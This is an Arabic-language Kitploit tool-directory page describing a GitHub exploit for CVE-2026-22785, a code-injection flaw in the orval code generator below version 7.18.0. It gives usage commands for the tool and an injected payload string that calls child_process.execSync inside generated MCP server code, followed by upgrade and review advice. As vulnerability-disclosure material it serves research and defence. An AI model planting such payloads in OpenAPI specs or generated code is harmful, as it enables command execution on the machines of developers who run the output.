Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/langbyyi/cve-2026-22785
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبالتعلم والتعليم
GitHublangbyyi/cve-2026-22785

CVE-2026-22785

أداة استغلال لـ CVE-2026-22785، وهي حقن كود حرج في orval < 7.18.0. توفر تنفيذ أوامر الصدفة وفحص الملفات لإظهار الثغرة والتحقق من حقن الحمولة.

عرض المستودع
1منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

برنامج تعليمي لإعادة إنتاج CVE-2026-22785

نظرة عامة على الثغرة

  • CVE: CVE-2026-22785
  • التأثير: orval < 7.18.0
  • الإصلاح: orval >= 7.18.0
  • CVSS: 9.3 حرجة
  • النوع: حقن كود

مبدأ الثغرة

عند إنشاء كود خادم MCP في orval < 7.18.0، يتم لصق حقل summary من مواصفات OpenAPI مباشرة في القالب دون تهريب، مما يؤدي إلى حقن كود.

خطوات إعادة الإنتاج

1. تجهيز البيئة

root@kitploit:~
cd exploit
npm install

2. استخدام الأداة

root@kitploit:~
# تنفيذ الأمر (استغلال الثغرة)
python cve_tool.py shell <أمر>

# مثال
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir

# فحص ملف
python cve_tool.py scan <ملف>

3. شرح المخرجات

root@kitploit:~
<مخرجات الأمر>
[+] CVE-2026-22785: تم حقن الحمولة بنجاح
[+] موقع الحقن: server.ts:31

دليل الثغرة

كود server.ts المُنشأ:

root@kitploit:~
server.tool(
  'getApiDemo',
  'API.' + require('child_process').execSync('whoami', {}),//',
  getApiDemoHandler
);

توصيات دفاعية

  1. قم بترقية orval إلى >= 7.18.0
  2. تحقق من مصدر مواصفات OpenAPI
  3. راجع الكود المُنشأ
تنزيل الأداة